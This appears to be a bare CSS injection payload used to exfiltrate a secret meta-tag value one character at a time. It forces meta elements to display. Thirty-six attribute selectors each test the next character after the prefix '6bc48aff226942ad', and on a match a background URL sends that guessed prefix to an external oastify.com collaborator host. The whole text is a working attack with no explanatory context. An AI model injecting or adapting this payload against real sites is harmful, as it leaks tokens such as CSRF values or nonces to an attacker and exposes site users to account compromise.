meta, head {
 display: block;   
}
meta[content^="6bc48aff226942ada"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ada");}
meta[content^="6bc48aff226942adb"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adb");}
meta[content^="6bc48aff226942adc"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adc");}
meta[content^="6bc48aff226942add"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942add");}
meta[content^="6bc48aff226942ade"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ade");}
meta[content^="6bc48aff226942adf"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adf");}
meta[content^="6bc48aff226942adg"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adg");}
meta[content^="6bc48aff226942adh"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adh");}
meta[content^="6bc48aff226942adi"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adi");}
meta[content^="6bc48aff226942adj"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adj");}
meta[content^="6bc48aff226942adk"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adk");}
meta[content^="6bc48aff226942adl"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adl");}
meta[content^="6bc48aff226942adm"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adm");}
meta[content^="6bc48aff226942adn"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adn");}
meta[content^="6bc48aff226942ado"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ado");}
meta[content^="6bc48aff226942adp"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adp");}
meta[content^="6bc48aff226942adq"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adq");}
meta[content^="6bc48aff226942adr"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adr");}
meta[content^="6bc48aff226942ads"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ads");}
meta[content^="6bc48aff226942adt"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adt");}
meta[content^="6bc48aff226942adu"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adu");}
meta[content^="6bc48aff226942adv"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adv");}
meta[content^="6bc48aff226942adw"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adw");}
meta[content^="6bc48aff226942adx"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adx");}
meta[content^="6bc48aff226942ady"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ady");}
meta[content^="6bc48aff226942adz"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942adz");}
meta[content^="6bc48aff226942ad0"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad0");}
meta[content^="6bc48aff226942ad1"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad1");}
meta[content^="6bc48aff226942ad2"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad2");}
meta[content^="6bc48aff226942ad3"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad3");}
meta[content^="6bc48aff226942ad4"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad4");}
meta[content^="6bc48aff226942ad5"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad5");}
meta[content^="6bc48aff226942ad6"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad6");}
meta[content^="6bc48aff226942ad7"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad7");}
meta[content^="6bc48aff226942ad8"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad8");}
meta[content^="6bc48aff226942ad9"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc48aff226942ad9");}
